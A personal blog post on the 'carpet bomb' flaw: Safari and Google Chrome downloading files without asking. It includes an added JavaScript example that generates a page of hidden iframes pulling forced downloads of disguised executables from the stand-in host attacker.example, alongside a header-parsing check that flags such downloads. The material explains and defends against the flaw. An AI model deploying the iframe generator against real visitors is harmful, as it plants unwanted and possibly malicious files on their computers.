hac.’s Weblog


Just a place to share my life

Google Chrome has the same bomb as Safari

Yesterday, Google released its new web browser, Chrome, and I downloaded it and gave it a try. After reading the brief introduction on its official homepage, I discovered that there may be a vulnerability. Here is the description from the official page.

No intrusive download manager; you see your download’s status at the bottom of your current window.

I did not watch the introduction video yet, but from that description, the first thing I wondered was: does it have the same carpet bomb as Safari? Some of you may not have read my earlier entry about the carpet bomb in Safari. There is a bomb because Safari does not notify the user before it starts downloading a file from a website. This means a web page can push tons of files onto the victim's computer without any notification and fill a folder with them (in Safari, the default destination for downloaded files is the desktop, so you can imagine what happens). With a friendly file name, you can even entice the victim to execute your evil file.
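To make the mechanism concrete, here is an added example (not code from the original post, from Apple, or from Google): the attacker side is a page full of hidden iframes whose URLs the server answers with a Content-Disposition: attachment header, which is what makes a browser save a file without the user clicking anything; the defender side is a small check that parses that header out of a response and flags the "friendly" file names the post mentions, such as an executable hiding behind a second, harmless-looking extension. The host attacker.example, the /file/<n> path, and the sample file names are all assumptions constructed for this demonstration.

```javascript
// Added example, not code from the original post. It shows (a) the page a
// carpet-bomb site serves and the response headers that force the download,
// and (b) a header check a defender can apply to the same traffic.
// Everything named here is assumed: the host attacker.example, the /file/<n>
// path, and the sample file names are constructed for the demonstration.

// Extensions Windows executes on double-click (illustrative set, not exhaustive).
const EXECUTABLE_EXTENSIONS = new Set([
  'exe', 'scr', 'bat', 'cmd', 'com', 'pif', 'js', 'vbs', 'hta', 'msi',
]);

// (a) Attacker side: N hidden iframes, each pointing at a URL the server
// answers with "Content-Disposition: attachment". A browser that saves
// attachments without asking writes N files to the download folder.
function buildCarpetBombPage(baseUrl, count) {
  const frames = [];
  for (let i = 0; i < count; i++) {
    frames.push(`<iframe src="${baseUrl}/file/${i}" style="display:none"></iframe>`);
  }
  return `<!doctype html><html><body>\n${frames.join('\n')}\n</body></html>`;
}

// Response headers the server sends for each /file/<n>; the filename is the
// "friendly name" the attacker chooses.
function attachmentHeaders(filename) {
  return {
    'Content-Type': 'application/octet-stream',
    'Content-Disposition': `attachment; filename="${filename}"`,
  };
}

// (b) Defender side: parse a Content-Disposition value (quoted or bare
// filename parameter) into its disposition type and filename.
function parseContentDisposition(header) {
  const m = /^\s*(attachment|inline)\s*(;.*)?$/i.exec(header);
  if (!m) return null;
  const params = m[2] || '';
  const quoted = /filename\s*=\s*"([^"]*)"/i.exec(params);
  const bare = quoted ? null : /filename\s*=\s*([^;\s]+)/i.exec(params);
  const hit = quoted || bare;
  return { type: m[1].toLowerCase(), filename: hit ? hit[1].trim() : null };
}

// Classify a filename: 'disguised' when a benign-looking extension sits in
// front of an executable one (photo.jpg.exe), 'executable' for a plain
// executable, 'ok' otherwise.
function classifyFilename(filename) {
  if (!filename) return 'ok';
  const parts = filename.toLowerCase().split('.');
  if (parts.length < 2) return 'ok';
  const last = parts[parts.length - 1];
  if (!EXECUTABLE_EXTENSIONS.has(last)) return 'ok';
  return parts.length >= 3 ? 'disguised' : 'executable';
}

// Run the check over a list of response header objects: was the download
// forced, what name would it be saved under, and how does that name look.
function auditResponses(headers) {
  return headers.map((h) => {
    const cd = parseContentDisposition(h['Content-Disposition'] || '');
    const filename = cd ? cd.filename : null;
    return {
      forced: !!cd && cd.type === 'attachment',
      filename,
      verdict: classifyFilename(filename),
    };
  });
}

// Constructed sample: the responses the bomb page above would pull down.
const SAMPLE_FILENAMES = ['photo.jpg.exe', 'readme.txt', 'setup.exe'];
const SAMPLE_RESPONSES = SAMPLE_FILENAMES.map(attachmentHeaders);

console.log(buildCarpetBombPage('http://attacker.example', 3));
console.log(auditResponses(SAMPLE_RESPONSES));
```

The audit only looks at the header, which is exactly the point: nothing in the page itself is needed for the download to happen, so a browser (or proxy) that wants to protect the user has to decide at the response, either by asking where to save the file or by refusing to save it silently.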

Unfortunately, the default setting of Google Chrome has the same problem: it downloads files without asking the user's permission, although the destination of downloaded files is not the desktop. Luckily, unlike Safari, Chrome allows the user to choose the destination each time a file is about to be downloaded. So before using Chrome as your default browser, customize its download location setting first.

I can imagine that more bugs will come out of Chrome in the future (of course, no software is perfect). So until the next bug is discovered, enjoy your life in Google Chrome.


Filed under: app sec